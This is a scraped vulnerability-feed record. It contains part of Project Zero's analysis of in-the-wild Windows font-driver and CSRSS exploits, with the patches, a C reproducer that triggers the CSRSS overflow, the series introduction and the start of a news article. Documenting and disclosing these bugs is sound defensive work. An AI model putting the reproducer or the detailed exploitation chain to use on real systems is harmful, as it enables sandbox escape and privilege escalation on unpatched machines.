fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did \u2013 it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.\n\nOnce kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.\n\n### The fixes\n\nWe reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.\n\nSince both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[16];\n\nFixed16_16 values[16];\n\nif (g_font->numMasters > 0x10) {\n\nreturn -4;\n\n}\n\n[...]\n\n} \n \n--- \n \nIn the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nif (num_master >= 16) {\n\nreturn -4;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\n[...]\n\n} \n \n--- \n \n## 2\\. CSRSS issue on Windows 10 (CVE-2020-1027)\n\n### Background\n\nThe Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.\n\ncsrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can\u2019t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.\n\nThe communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:\n\nNTSTATUS CsrClientCallServer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nLONG DataLength); \n \n--- \n \nThe ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.\n\nThe reader can refer to [this series of posts](<https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-the-basics/>) for a detailed description of the CSRSS internals.\n\nOne of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.MySampleApp\"\n\nversion=\"1.0.0.0\" processorArchitecture=\"x86\"/>\n\n<dependency>\n\n<dependentAssembly>\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Tools.MyPrivateDll\"\n\nversion=\"2.5.0.0\" processorArchitecture=\"x86\"/>\n\n</dependentAssembly>\n\n</dependency>\n\n</assembly> \n \n--- \n \n### The bug\n\nThe vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.\n\nThe relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:\n\ntypedef struct _UNICODE_STRING {\n\nUSHORT Length;\n\nUSHORT MaximumLength;\n\nPWSTR Buffer;\n\n} UNICODE_STRING, *PUNICODE_STRING; \n \n--- \n \nBaseSrvSxsCreateActivationContext starts with validating the string parameters:\n\nfor (i = 0; i < 6; ++i) {\n\nif (StringField = StringFields[i]) {\n\nLength = StringField->Length;\n\nif (Length && !StringField->Buffer ||\n\nLength > StringField->MaximumLength || Length & 1)\n\nreturn 0xC000000D;\n\nif (StringField->Buffer) {\n\nif (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,\n\nLength + 2, 1)) {\n\nDbgPrintEx(0x33, 0,\n\n\"SXS: Validation of message buffer 0x%lx failed.\\n\"\n\n\" Message:%p\\n\"\n\n\" String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\\n\",\n\ni, ApiMessage, StringField, StringField->Length,\n\nStringField->MaximumLength, StringField->Buffer);\n\nreturn 0xC000000D;\n\n}\n\nCharCount = StringField->Length >> 1;\n\nif (StringField->Buffer[CharCount] &&\n\nStringField->Buffer[CharCount - 1])\n\nreturn 0xC000000D;\n\n}\n\n}\n\n} \n \n--- \n \nCsrValidateMessageBuffer is declared as follows:\n\nBOOLEAN CsrValidateMessageBuffer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID* Buffer,\n\nULONG ElementCount,\n\nULONG ElementSize); \n \n--- \n \nThis function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn\u2019t cause an integer overflow, and 3) it doesn\u2019t go past the end of the capture buffer.\n\nAs the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we\u2019ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:\n\nsxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity\n\nsxs!CNodeFactory::CreateNode\n\nsxs!XMLParser::Run\n\nsxs!SxspIncorporateAssembly\n\nsxs!SxspCloseManifestGraph\n\nsxs!SxsGenerateActivationContext\n\nsxssrv!BaseSrvSxsCreateActivationContextFromStructEx\n\nsxssrv!BaseSrvSxsCreateActivationContext\n\nWhen BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName\u2019s buffer and the unaudited MaximumLength value as the buffer size:\n\nBufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;\n\nif (BufferCapacity) {\n\nGenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;\n\nGenActCtxParams.ApplicationNameBuffer =\n\nCreateCtxParams->ApplicationName.Buffer;\n\n} else {\n\nGenActCtxParams.ApplicationNameCapacity = 60;\n\nStringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);\n\nif (!StringBuffer) {\n\nStatus = 0xC0000017;\n\ngoto error;\n\n}\n\nGenActCtxParams.ApplicationNameBuffer = StringBuffer;\n\n} \n \n--- \n \nThen sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:\n\nContext = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);\n\nif (Context) {\n\nContext = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);\n\n} else {\n\nFusionpTraceAllocFailure(v14);\n\nSetLastError(0xE);\n\ngoto error;\n\n}\n\nif (GenActCtxParams->ApplicationNameBuffer &&\n\nGenActCtxParams->ApplicationNameCapacity) {\n\nContext->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;\n\nContext->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;\n\n} \n \n--- \n \nUltimately, sxs!CNodeFactory::\n\nXMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:\n\nIdentityNameBuffer = 0;\n\nIdentityNameLength = 0;\n\nSetLastError(0);\n\nif (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,\n\n&IdentityNameBuffer,\n\n&IdentityNameLength)) {\n\nCallSiteInfo = off_16506FA20;\n\ngoto error;\n\n}\n\nif (IdentityNameLength &&\n\nIdentityNameLength < Context->ApplicationNameCapacity) {\n\nmemcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,\n\n2 * IdentityNameLength + 2);\n\nContext->ApplicationNameLength = IdentityNameLength;\n\n} else {\n\n*Context->ApplicationNameBuffer = 0;\n\nContext->ApplicationNameLength = 0;\n\n} \n \n--- \n \nThe source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.\n\n### Exploitation\n\nEven though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.\n\nAs a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there\u2019s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it\u2019s quite difficult to reliably make a \u201cuseful\u201d allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.\n\nThe logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:\n\n * Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.\n\n * csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the \u201clocal\u201d and \u201cremote\u201d addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.\n\nThe exploit also has to bypass another security feature, Microsoft\u2019s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG\u2019s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:\n\n1\\. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN=\"BB...BB\u201d. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.\n\n2\\. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.\n\n3\\. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:\n\ntypedef struct _LDR_MODULE {\n\nLIST_ENTRY InLoadOrderModuleList;\n\nLIST_ENTRY InMemoryOrderModuleList;\n\nLIST_ENTRY InInitializationOrderModuleList;\n\nPVOID BaseAddress;\n\nPVOID EntryPoint;\n\nULONG SizeOfImage;\n\nUNICODE_STRING FullDllName;\n\nUNICODE_STRING BaseDllName;\n\nULONG Flags;\n\nSHORT LoadCount;\n\nSHORT TlsIndex;\n\nLIST_ENTRY HashTableEntry;\n\nULONG TimeDateStamp;\n\n} LDR_MODULE, *PLDR_MODULE; \n \n--- \n \nWhen a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can\u2019t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.\n\n4\\. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.\n\n5\\. Restore the module list. Once the execution reaches the fake module list processing, it\u2019s important to restore PEB_LDR_DATA\u2019s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.\n\n6\\. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.\n\n7\\. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.\n\n8\\. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.\n\n### The fix\n\nWe reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.\n\nThe patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:\n\nApplicationName = ApiMessage->CreateActivationContext.ApplicationName;\n\nif (ApplicationName.MaximumLength &&\n\n!CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,\n\nApplicationName.MaximumLength, 1)) {\n\nSavedMaximumLength = ApplicationName.MaximumLength;\n\nApplicationName.MaximumLength = ApplicationName.Length + 2;\n\n}\n\n[...]\n\nif (SavedMaximumLength)\n\nApiMessage->CreateActivationContext.ApplicationName.MaximumLength =\n\nSavedMaximumLength;\n\nreturn result; \n \n--- \n \n### Appendix A\n\nThe following reproducer has been tested on Windows 10.0.18363.959.\n\n#include <stdint.h>\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#include <string>\n\nconst char* MANIFEST_CONTENTS =\n\n\"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\"\n\n\"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>\"\n\n\"<assemblyIdentity name='@' version='1.0.0.0' type='win32' \"\n\n\"processorArchitecture='amd64'/>\"\n\n\"</assembly>\";\n\nconst WCHAR* NULL_BYTE_STR = L\"\\x00\\x00\";\n\nconst WCHAR* MANIFEST_NAME =\n\nL\"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_\"\n\nL\"d761caeca23d64a2.manifest\";\n\nconst WCHAR* PATH = L\"\\\\\\\\\\\\\\\\.\\\\\\c:Windows\\\\\\\";\n\nconst WCHAR* MODULE = L\"System.Data.SqlXml.Resources\";\n\ntypedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,\n\nULONG BufferSize);\n\nf_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;\n\ntypedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nULONG DataLength);\n\nf_CsrClientCallServer CsrClientCallServer;\n\ntypedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,\n\nPCSTR String,\n\nULONG Length,\n\nULONG MaximumLength,\n\nPSTR OutputString);\n\nf_CsrCaptureMessageString CsrCaptureMessageString;\n\nNTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,\n\nPCWSTR String, ULONG Length = 0) {\n\nif (Length == 0) {\n\nLength = lstrlenW(String);\n\n}\n\nreturn CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,\n\nLength * 2 + 2, OutputString);\n\n}\n\nint main() {\n\nHMODULE Ntdll = LoadLibrary(L\"Ntdll.dll\");\n\nCsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(\n\nNtdll, \"CsrAllocateCaptureBuffer\");\n\nCsrClientCallServer =\n\n(f_CsrClientCallServer)GetProcAddress(Ntdll, \"CsrClientCallServer\");\n\nCsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(\n\nNtdll, \"CsrCaptureMessageString\");\n\nchar Message[0x220];\n\nmemset(Message, 0, 0x220);\n\nPVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);\n\nstd::string Manifest = MANIFEST_CONTENTS;\n\nManifest.replace(Manifest.find('@'), 1, 0x2000, 'A');\n\n// There's no public definition of the relevant CSR_API_MSG structure.\n\n// The offsets and values are taken directly from the exploit.\n\n*(uint32_t*)(Message + 0x40) = 0xc1;\n\n*(uint16_t*)(Message + 0x44) = 9;\n\n*(uint16_t*)(Message + 0x59) = 0x201;\n\n// CSRSS loads the manifest contents from the client process memory;\n\n// therefore, it doesn't have to be stored in the capture buffer.\n\n*(const char**)(Message + 0x80) = Manifest.c_str();\n\n*(uint64_t*)(Message + 0x88) = Manifest.size();\n\n*(uint64_t*)(Message + 0xf0) = 1;\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);\n\n// Triggers the issue by setting ApplicationName.MaxLength to a large value.\n\n*(uint16_t*)(Message + 0x122) = 0x8000;\n\nCsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);\n\n} \n \n--- \n \nThis is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Windows Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-25T01:57:26", "description": "This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.\n\nAt Project Zero we often refer to our goal simply as \u201cmake 0-day hard\u201d. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn\u2019t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community\u2019s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).\n\nTherefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. \n\nWe discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.\n\n[![Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)\n\nFrom the exploit servers, we have extracted:\n\n * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.\n * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.\n * A \u201cprivilege escalation kit\u201d composed of publicly known n-day exploits for older versions of Android.\n\nThe four 0-days discovered in these chains have been fixed by the appropriate vendors:\n\n * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \\- Chrome Vulnerability in TurboFan (fixed February 2020)\n * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \\- Windows CSRSS Vulnerability (fixed April 2020)\n\nWe understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the \"fast\" or \"slow\" exploitation paths. \n\nThe Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.\n\nThe posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:\n\n * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,\n * A deep look into the bug class of one of the Chrome exploits, and\n * An in-depth teardown of the Android post-exploitation code.\n\nIn addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. \n\nExploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.\n\nWe recommend reading the posts in the following order:\n\n 1. Introduction (this post)\n 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\n 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)\n 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)\n 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)\n 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)\n\nThis is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIntroducing the In-the-Wild Series\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "href": "https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-13T17:23:32", "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. \u201cOne server targeted Windows users, the other targeted Android.\u201d\n\n[![2020 Reader Survey: Share Your Feedback to Help Us Improve](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/18164737/Reader-Survey-Update.jpg)](<https://threatpost.com/2020-reader-survey/161168/>)\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened 